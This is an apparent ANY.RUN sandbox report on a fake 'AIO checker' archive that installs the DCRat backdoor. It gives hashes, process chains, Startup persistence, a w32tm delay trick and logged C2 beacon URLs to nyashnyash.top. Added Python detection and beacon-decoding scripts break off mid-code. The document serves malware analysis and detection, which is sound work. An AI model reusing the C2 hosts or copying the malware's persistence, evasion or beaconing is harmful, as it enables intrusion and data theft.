File name:

Telegram Desktop.zip

Full analysis: https://app.any.run/tasks/6af9818a-7b8b-4654-8439-10c6fb309e11
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Analysis date: March 08, 2024, 20:13:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
stealer
rat
backdoor
dcrat
remote
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

311F8E33DE278E9A2A3A09086CB444E1

SHA1:

7D1006C3D39D868DE2540BE2E888CE4C4C35A6D3

SHA256:

D86296CBA8A3752B0D794CE152830A544EC7CD7B64DBCDF2ACA73481CEC59DE9

SSDEEP:

98304:d/jRLcZisO7KOFogtb4Kfcsoc6BfjJRSZWPNqQWnGV6ZaSZNkHKaVANJxZ6K9R3w:LFwHSPgOCQMnR6G7oK3u40zy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 3288)
      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)
    • Creates files in the Startup directory

      • ms_update.exe (PID: 3428)
    • Actions look like stealing of personal data

      • ms_updater.exe (PID: 2672)
    • Connects to the CnC server

      • ms_updater.exe (PID: 2672)
    • DCRAT has been detected (SURICATA)

      • ms_updater.exe (PID: 2672)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 3784)
    • Executable content was dropped or overwritten

      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3784)
      • AIO checker 2023.exe (PID: 3948)
      • ms_updater.exe (PID: 2672)
    • Reads the Internet Settings

      • AIO checker 2023.exe (PID: 3948)
      • ms_updater.exe (PID: 2672)
    • Reads settings of System Certificates

      • ms_updater.exe (PID: 2672)
    • Executing commands from a ".bat" file

      • ms_updater.exe (PID: 2672)
    • Starts CMD.EXE for commands execution

      • ms_updater.exe (PID: 2672)
    • Probably delays execution using 'w32tm.exe'

      • cmd.exe (PID: 2564)
  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3784)
    • Checks supported languages

      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)
      • ms_updater.exe (PID: 2672)
    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 3784)
    • Reads the computer name

      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)
      • ms_updater.exe (PID: 2672)
    • Creates files or folders in the user directory

      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)
    • Manual execution by a user

      • WinRAR.exe (PID: 3784)
    • Reads the machine GUID from the registry

      • ms_update.exe (PID: 3428)
      • ms_updater.exe (PID: 2672)
    • Reads Environment values

      • ms_updater.exe (PID: 2672)
    • Reads the software policy settings

      • ms_updater.exe (PID: 2672)
    • Creates files in a temporary directory

      • ms_updater.exe (PID: 2672)
    • Reads product name

      • ms_updater.exe (PID: 2672)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2024:03:08 22:08:54
ZipCRC: 0xee9d007f
ZipCompressedSize: 2018010
ZipUncompressedSize: 2017354
ZipFileName: AIO checker 2023.rar
No data.
All screenshots are available in the full report
Total processes
50
Monitored processes
8
Malicious processes
3
Suspicious processes
1

Behavior graph (process tree, parents taken from the process information below; "no specs" marks processes the sandbox did not profile in detail)

explorer.exe
  winrar.exe (PID 3288, no specs) opens Telegram Desktop.zip
explorer.exe
  winrar.exe (PID 3784) opens AIO checker 2023.rar
    aio checker 2023.exe (PID 3948)
      ms_update.exe (PID 3428)
      ms_updater.exe (PID 4060, no specs)
      ms_updater.exe (PID 2672) #DCRAT
        cmd.exe (PID 2564, no specs)
          w32tm.exe (PID 2900, no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 2564
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\HfroAScfQF.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: ms_updater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2672
CMD: "C:\Users\admin\AppData\Roaming\ms_updater.exe"
Path: C:\Users\admin\AppData\Roaming\ms_updater.exe
Parent process: AIO checker 2023.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\users\admin\appdata\roaming\ms_updater.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
PID: 2900
CMD: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Path: C:\Windows\System32\w32tm.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Time Service Diagnostic Tool
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\w32tm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 3288
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Telegram Desktop.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 3428
CMD: "C:\Users\admin\AppData\Roaming\ms_update.exe"
Path: C:\Users\admin\AppData\Roaming\ms_update.exe
Parent process: AIO checker 2023.exe
User:
admin
Company:
Google 1989-2023
Integrity Level:
MEDIUM
Description:
MicrosoftWindows
Exit code:
0
Version:
15.6.13.6
Modules
Images
c:\users\admin\appdata\roaming\ms_update.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 3784
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\AIO checker 2023.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 3948
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\AIO checker 2023.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\AIO checker 2023.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa3784.37364\aio checker 2023.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
PID: 4060
CMD: "C:\Users\admin\AppData\Roaming\ms_updater.exe"
Path: C:\Users\admin\AppData\Roaming\ms_updater.exe
Parent process: AIO checker 2023.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED: the image asks for administrator rights and could not start at MEDIUM integrity; the same binary runs again as PID 2672 at HIGH integrity, and only that instance reaches the C2)
Version:
5.15.2.0
Modules
Images
c:\users\admin\appdata\roaming\ms_updater.exe
c:\windows\system32\ntdll.dll
Total events
16 530
Read events
16 443
Write events
84
Delete events
3

Modification events

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\phacker.zip

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\Telegram Desktop.zip

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (3288) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120
Executable files
7
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID 3784, WinRAR.exe, executable
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\DscCoreConfProv.dll
MD5: 850FB0501D6ED3035CF6CAEC764428DF
SHA256: D3348083905C789CEF44A55CDA47EB1844B1C393C10FABC6BE9A26565B6D6607

PID 3784, WinRAR.exe, executable
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\DscCore.dll
MD5: 392A0DF275F04FF940215D4CAFDB257E
SHA256: C4084F617ED1DFDACA814CC9375A62D1FB466226F36AA53255C33B108725F29F

PID 3784, WinRAR.exe, executable
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\AIO checker 2023.exe
MD5: EF1999D5B9E6552E39F691A3631469B6
SHA256: 33489E9AA842320D1175C609EBE01A35645F0D945BAEFD4F4F345A966000EA4A

PID 2672, ms_updater.exe, text
Filename: C:\Users\admin\AppData\Local\Temp\T8glikZ0oB
MD5: 2C0701A49FC53BB2C5EDCEB82507F429
SHA256: 280FC01B7BBAA616FE69A3E1DFA65D9D020B0A36A3081A6856403ED5DF1F7960

PID 2672, ms_updater.exe, text
Filename: C:\Users\admin\AppData\Local\Temp\HfroAScfQF.bat
MD5: E772C0B3F1FF0B3404FF04A71715940F
SHA256: BF372C824A9DFE2466E7E1D3E0E5184E3B8988D1A368BF4464B9F6B2AFA86AE6

PID 3948, AIO checker 2023.exe, executable
Filename: C:\Users\admin\AppData\Roaming\ms_updater.exe
MD5: 9195E6C24D5BC6FC15E3720D53021D60
SHA256: 22120341BEA07E0830B02CFD910C64D653B102D5BBFCFF89675BB8AB3996A3CA

PID 3428, ms_update.exe, executable
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe
MD5: 1D4ED7311DEA909CC611A87C49BA3C0D
SHA256: 05FFEBB5C07F918E31AD85B05118FAE2E8C556F07BCD473EF9047654B123E907

PID 3288, WinRAR.exe, compressed
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRa3288.36030\AIO checker 2023.rar
MD5: 90A345AC93B006DEA131ACA168718391
SHA256: A47BA41E74559A9121C6687FED7BF6CB32EC4659557A1B7D8790D300926A064A

PID 3784, WinRAR.exe, text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\README.txt
MD5: 229BFB07694F123E2CB4986F47100A62
SHA256: 8DF26B1F550C80646F01D25B8AAFCABB1342BBB2BE1CD335CDB8D254BE8C4090

PID 3784, WinRAR.exe, executable
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\drvstore.dll
MD5: EF4C4EA376D172D966AB31388B3B63B6
SHA256: FF07C7B6CA66200A20D28668E4E9B401936EAB7F9A4FBD9F90BBA3D49E19AD77
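The process chain, exit codes, version-info fields and dropped files above can be turned into host-side detection logic. The following Python is an added example and is not part of the ANY.RUN report: the events are constructed by hand from the report's process table and "Dropped files" list, in a simplified Sysmon-like shape whose field names are my own, and the rules flag what the sandbox signatures describe: the w32tm /stripchart sleep, cmd.exe running a .bat out of %TEMP% under a non-shell parent, the elevation retry of ms_updater.exe (exit 0xC000042C at MEDIUM, then a HIGH-integrity run), the Company/Description mismatch in ms_update.exe, and the Startup-folder drop.

```python
"""Host-side triage of the process chain in this report.
Added example, not part of the ANY.RUN report: the events are constructed by
hand from the report's process table, exit codes, version info and dropped
files, in a simplified Sysmon-like shape whose field names are my own."""
import ntpath
import re

STATUS_ELEVATION_REQUIRED = 0xC000042C  # = 3221226540, the exit code of PID 4060
SHELLS = {"cmd.exe", "powershell.exe", "explorer.exe"}
VENDOR_WORDS = ("microsoft", "google", "adobe", "oracle", "mozilla")
STARTUP_DIR = "\\start menu\\programs\\startup\\"
EXEC_EXT = {".exe", ".bat", ".cmd", ".vbs", ".js", ".lnk", ".ps1", ".scr"}


def ev(pid, parent, image, cmd, integrity, exit_code, company=None, description=None):
    return dict(pid=pid, parent=parent, image=image, cmd=cmd, integrity=integrity,
                exit=exit_code, company=company, description=description)


ROAMING = r"C:\Users\admin\AppData\Roaming"
EVENTS = [  # process-creation events, constructed from the report
    ev(3428, "AIO checker 2023.exe", ROAMING + r"\ms_update.exe", f'"{ROAMING}\\ms_update.exe"',
       "MEDIUM", 0, "Google 1989-2023", "MicrosoftWindows"),
    ev(4060, "AIO checker 2023.exe", ROAMING + r"\ms_updater.exe", f'"{ROAMING}\\ms_updater.exe"',
       "MEDIUM", 3221226540),
    ev(2672, "AIO checker 2023.exe", ROAMING + r"\ms_updater.exe", f'"{ROAMING}\\ms_updater.exe"',
       "HIGH", 0),
    ev(2564, "ms_updater.exe", r"C:\Windows\System32\cmd.exe",
       r'C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\HfroAScfQF.bat" "',
       "HIGH", 1, "Microsoft Corporation", "Windows Command Processor"),
    ev(2900, "cmd.exe", r"C:\Windows\System32\w32tm.exe",
       "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2",
       "HIGH", 0, "Microsoft Corporation", "Windows Time Service Diagnostic Tool"),
]
FILE_EVENTS = [  # file-create events, constructed from the "Dropped files" table
    {"pid": 3428, "process": "ms_update.exe",
     "path": ROAMING + r"\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe"},
    {"pid": 3948, "process": "AIO checker 2023.exe", "path": ROAMING + r"\ms_updater.exe"},
]


def w32tm_delay_seconds(cmd):
    """Length of the w32tm /stripchart 'sleep' in seconds, or None if cmd is not one.
    /stripchart against localhost prints /samples:N readings /period:P seconds apart,
    so it blocks for about (N-1)*P seconds; without /samples it runs until interrupted."""
    low = cmd.lower()
    if "w32tm" not in low or "/stripchart" not in low or "/computer:localhost" not in low:
        return None
    period = re.search(r"/period:(\d+)", low)
    samples = re.search(r"/samples:(\d+)", low)
    seconds_apart = int(period.group(1)) if period else 2  # w32tm default period
    if not samples:
        return float("inf")
    return (int(samples.group(1)) - 1) * seconds_apart


def temp_bat_from_non_shell(e):
    """cmd.exe /c running a .bat out of %TEMP%, launched by something that is not a shell."""
    low = e["cmd"].lower()
    return (ntpath.basename(e["image"]).lower() == "cmd.exe" and "/c" in low
            and re.search(r"\\appdata\\local\\temp\\[^\"]+\.bat", low) is not None
            and e["parent"].lower() not in SHELLS)


def elevation_retries(events):
    """Same image exiting at MEDIUM with STATUS_ELEVATION_REQUIRED (CreateProcess refused
    a manifest that asks for administrator), then running at HIGH: an elevated relaunch."""
    runs = {}
    for e in events:
        runs.setdefault(e["image"].lower(), []).append(e)
    hits = []
    for image, evs in runs.items():
        failed = [x for x in evs if x["integrity"] == "MEDIUM" and x["exit"] == STATUS_ELEVATION_REQUIRED]
        elevated = [x for x in evs if x["integrity"] == "HIGH"]
        if failed and elevated:
            hits.append((ntpath.basename(image), failed[0]["pid"], elevated[0]["pid"]))
    return hits


def version_info_mismatch(e):
    """Vendors named in FileDescription that CompanyName does not mention."""
    company = (e.get("company") or "").lower()
    desc = (e.get("description") or "").lower()
    return [v for v in VENDOR_WORDS if v in desc and v not in company]


def startup_drop(fe):
    low = fe["path"].lower()
    return STARTUP_DIR in low and ntpath.splitext(low)[1] in EXEC_EXT


def triage(events, file_events):
    """Run every rule and return one finding string per hit."""
    findings = []
    for e in events:
        delay = w32tm_delay_seconds(e["cmd"])
        if delay is not None:
            findings.append(f"pid {e['pid']}: w32tm /stripchart used as a ~{delay:g}s sleep (parent {e['parent']})")
        if temp_bat_from_non_shell(e):
            findings.append(f"pid {e['pid']}: cmd.exe runs a .bat from %TEMP%, spawned by {e['parent']}")
        for vendor in version_info_mismatch(e):
            findings.append(f"pid {e['pid']}: description names '{vendor}' but CompanyName is '{e['company']}'")
    for image, failed_pid, ok_pid in elevation_retries(events):
        findings.append(f"{image}: pid {failed_pid} exited 0xC000042C STATUS_ELEVATION_REQUIRED at MEDIUM, pid {ok_pid} reran at HIGH")
    for fe in file_events:
        if startup_drop(fe):
            findings.append(f"pid {fe['pid']} ({fe['process']}): Startup-folder persistence -> {ntpath.basename(fe['path'])}")
    return findings


if __name__ == "__main__":
    for line in triage(EVENTS, FILE_EVENTS):
        print(line)
```

Each rule is independent, so a single hit (for example only the w32tm sleep) is a weak signal, while several from one parent chain, as here, are not. The version-info rule is deliberately narrow: it only compares vendor words, which is enough to catch "Google 1989-2023" signing off a "MicrosoftWindows" description without flagging the genuine Microsoft binaries in the same chain.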
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
7
DNS requests
2
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?WC98cmuphmuTjuFs85EaTwBwU=KtA3LkY0CVKg01t4&7d2ec6fa11a45062f73c3371e90be2d7=d2bcd0f2865f35a89899afe230c1002a&e95b42d7b0485703d17241e76e2b8585=AM5gzYmdjMklTM3QGNjJjNkdzY1QjYjFTMjhzM5YTN4UGNxgTZ3ITZ&WC98cmuphmuTjuFs85EaTwBwU=KtA3LkY0CVKg01t4
unknown
text
2.07 Kb
unknown
2672
ms_updater.exe
GET
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nIiBDNxEDOwIDN5QmZiRjNkZDZ5QmM4QDOjVDZ0E2NkdzMyQWY5YGOxIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
908 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&a05939b54e910a520ed16f4659e1d224=0VfiIiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=…
unknown
text
104 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&60fcc970050c21131ef204c321f6004c=…
unknown
text
104 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nIlZDOkFTNiZGNwMTOlFjYkljM4IDNlFjN2UDMwUWOlVzYlZWOkFmYlJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
108 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=…
unknown
text
104 b
unknown
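The query strings in the requests above are not random padding: the long values are standard Base64 written backwards, so reversing a value and decoding it recovers the plaintext, which turns out to be 40-character hex identifiers and small JSON documents keyed by 32-character hex names (the same shape as the parameter names themselves). The following Python is an added example, not code from ANY.RUN or from the malware: the two URLs are copied verbatim from the PID 2672 rows in the table, the labels returned by classify() are my own, and nothing in it contacts the C2.

```python
"""Decode the DCRat beacon query strings shown in the HTTP requests table.

Added example, not code from the ANY.RUN report or from the malware. The
observation it implements: the long query values are standard Base64 written
backwards, so value[::-1] decodes while the value itself does not. The labels
returned by classify() are my own names.
"""
import base64
import binascii
import json
from typing import Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

HEX = set("0123456789abcdef")

# Two request URLs copied from PID 2672's traffic in the report. Nothing in
# this script connects to them; they are only parsed.
FIRST_BEACON = (
    "http://355212cm.nyashnyash.top/nyashsupport.php"
    "?WC98cmuphmuTjuFs85EaTwBwU=KtA3LkY0CVKg01t4"
    "&7d2ec6fa11a45062f73c3371e90be2d7=d2bcd0f2865f35a89899afe230c1002a"
    "&e95b42d7b0485703d17241e76e2b8585=AM5gzYmdjMklTM3QGNjJjNkdzY1QjYjFTMjhzM5YTN4UGNxgTZ3ITZ"
    "&WC98cmuphmuTjuFs85EaTwBwU=KtA3LkY0CVKg01t4"
)
SECOND_BEACON = (
    "http://355212cm.nyashnyash.top/nyashsupport.php"
    "?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ"
    "&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM"
    "&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY"
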